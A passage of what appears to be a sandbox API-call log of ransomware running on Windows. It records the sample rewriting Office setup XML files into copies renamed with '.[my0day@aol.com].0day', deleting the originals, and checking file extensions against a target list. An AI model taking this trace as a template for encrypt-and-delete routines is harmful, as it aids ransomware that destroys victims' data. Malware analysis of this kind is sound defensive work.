SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.082] SetEndOfFile (hFile=0x1c4) returned 1 [0040.082] CloseHandle (hObject=0x1c4) returned 1 [0040.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.083] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0040.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.083] lstrlenW (lpString=".doc") returned 4 [0040.083] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.083] lstrlenW (lpString=".docx") returned 5 [0040.083] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.083] lstrlenW (lpString=".pdf") returned 4 [0040.083] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.083] lstrlenW (lpString=".xls") returned 4 [0040.083] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.083] lstrlenW (lpString=".xlsx") returned 5 [0040.083] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.083] lstrlenW (lpString=".ppt") returned 4 [0040.083] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.083] lstrlenW (lpString=".zip") returned 4 [0040.083] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.083] lstrlenW (lpString=".rar") returned 4 [0040.083] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.083] lstrlenW (lpString=".bz2") returned 4 [0040.083] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".7z") returned 3 [0040.084] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString=".dbf") returned 4 [0040.084] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString=".1cd") returned 4 [0040.084] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString=".jpg") returned 4 [0040.084] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString=".doc") returned 4 [0040.084] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".docx") returned 5 [0040.084] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.084] lstrlenW (lpString=".pdf") returned 4 [0040.084] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".xls") returned 4 [0040.084] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".xlsx") returned 5 [0040.084] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.084] lstrlenW (lpString=".ppt") returned 4 [0040.084] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.084] lstrlenW (lpString=".zip") returned 4 [0040.084] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.084] lstrlenW (lpString=".rar") returned 4 [0040.084] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".bz2") returned 4 [0040.084] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.084] lstrlenW (lpString=".7z") returned 3 [0040.085] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.085] lstrlenW (lpString=".dbf") returned 4 [0040.085] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.085] lstrlenW (lpString=".1cd") returned 4 [0040.085] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0040.085] lstrlenW (lpString=".jpg") returned 4 [0040.085] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.085] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.085] lstrlenW (lpString="SETUP.XML") returned 9 [0040.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.086] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=4207) returned 1 [0040.086] CloseHandle (hObject=0x1c4) returned 1 [0040.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20 [0040.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.086] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.086] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.087] GetLastError () returned 0x0 [0040.087] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x106f, lpOverlapped=0x0) returned 1 [0040.088] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1070, lpOverlapped=0x0) returned 1 [0040.089] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.089] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.089] SetEndOfFile (hFile=0x1b0) returned 1 [0040.089] CloseHandle (hObject=0x1b0) returned 1 [0040.090] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.090] SetEndOfFile (hFile=0x1c4) returned 1 [0040.091] CloseHandle (hObject=0x1c4) returned 1 [0040.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.091] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0040.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.091] lstrlenW (lpString=".doc") returned 4 [0040.091] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.091] lstrlenW (lpString=".docx") returned 5 [0040.091] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.091] lstrlenW (lpString=".pdf") returned 4 [0040.091] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.091] lstrlenW (lpString=".xls") returned 4 [0040.091] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.091] lstrlenW (lpString=".xlsx") returned 5 [0040.091] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.092] lstrlenW (lpString=".ppt") returned 4 [0040.092] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString=".zip") returned 4 [0040.092] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.092] lstrlenW (lpString=".rar") returned 4 [0040.092] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString=".bz2") returned 4 [0040.092] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString=".7z") returned 3 [0040.092] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString=".dbf") returned 4 [0040.092] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString=".1cd") returned 4 [0040.092] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString=".jpg") returned 4 [0040.092] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.092] lstrlenW (lpString=".doc") returned 4 [0040.092] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString=".docx") returned 5 [0040.092] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.092] lstrlenW (lpString=".pdf") returned 4 [0040.092] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString=".xls") returned 4 [0040.092] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.092] lstrlenW (lpString=".xlsx") returned 5 [0040.092] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.092] lstrlenW (lpString=".ppt") returned 4 [0040.092] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.093] lstrlenW (lpString=".zip") returned 4 [0040.093] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.093] lstrlenW (lpString=".rar") returned 4 [0040.093] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.093] lstrlenW (lpString=".bz2") returned 4 [0040.093] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.093] lstrlenW (lpString=".7z") returned 3 [0040.093] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.093] lstrlenW (lpString=".dbf") returned 4 [0040.093] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.093] lstrlenW (lpString=".1cd") returned 4 [0040.093] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.093] lstrlenW (lpString=".jpg") returned 4 [0040.093] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.093] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.093] lstrlenW (lpString="PowerPointMUI.XML") returned 17 [0040.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.094] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1450) returned 1 [0040.094] CloseHandle (hObject=0x1c4) returned 1 [0040.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20 [0040.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.094] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.094] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.095] GetLastError () returned 0x0 [0040.096] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x5aa, lpOverlapped=0x0) returned 1 [0040.097] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.098] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.098] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf6, lpOverlapped=0x0) returned 1 [0040.098] SetEndOfFile (hFile=0x1b0) returned 1 [0040.098] CloseHandle (hObject=0x1b0) returned 1 [0040.099] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.099] SetEndOfFile (hFile=0x1c4) returned 1 [0040.100] CloseHandle (hObject=0x1c4) returned 1 [0040.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.100] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.100] lstrlenW (lpString=".doc") returned 4 [0040.100] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.100] lstrlenW (lpString=".docx") returned 5 [0040.100] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.100] lstrlenW (lpString=".pdf") returned 4 [0040.100] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.100] lstrlenW (lpString=".xls") returned 4 [0040.100] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.100] lstrlenW (lpString=".xlsx") returned 5 [0040.100] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.100] lstrlenW (lpString=".ppt") returned 4 [0040.100] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.100] lstrlenW (lpString=".zip") returned 4 [0040.100] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.100] lstrlenW (lpString=".rar") returned 4 [0040.101] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".bz2") returned 4 [0040.101] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".7z") returned 3 [0040.101] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString=".dbf") returned 4 [0040.101] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString=".1cd") returned 4 [0040.101] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString=".jpg") returned 4 [0040.101] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString=".doc") returned 4 [0040.101] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".docx") returned 5 [0040.101] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.101] lstrlenW (lpString=".pdf") returned 4 [0040.101] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".xls") returned 4 [0040.101] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".xlsx") returned 5 [0040.101] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.101] lstrlenW (lpString=".ppt") returned 4 [0040.101] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.101] lstrlenW (lpString=".zip") returned 4 [0040.101] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.101] lstrlenW (lpString=".rar") returned 4 [0040.101] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.101] lstrlenW (lpString=".bz2") returned 4 [0040.102] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.102] lstrlenW (lpString=".7z") returned 3 [0040.102] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.102] lstrlenW (lpString=".dbf") returned 4 [0040.102] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.102] lstrlenW (lpString=".1cd") returned 4 [0040.102] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0040.102] lstrlenW (lpString=".jpg") returned 4 [0040.102] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.102] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.102] lstrlenW (lpString="SETUP.XML") returned 9 [0040.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.103] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1886) returned 1 [0040.103] CloseHandle (hObject=0x1c4) returned 1 [0040.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20 [0040.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.103] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.103] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 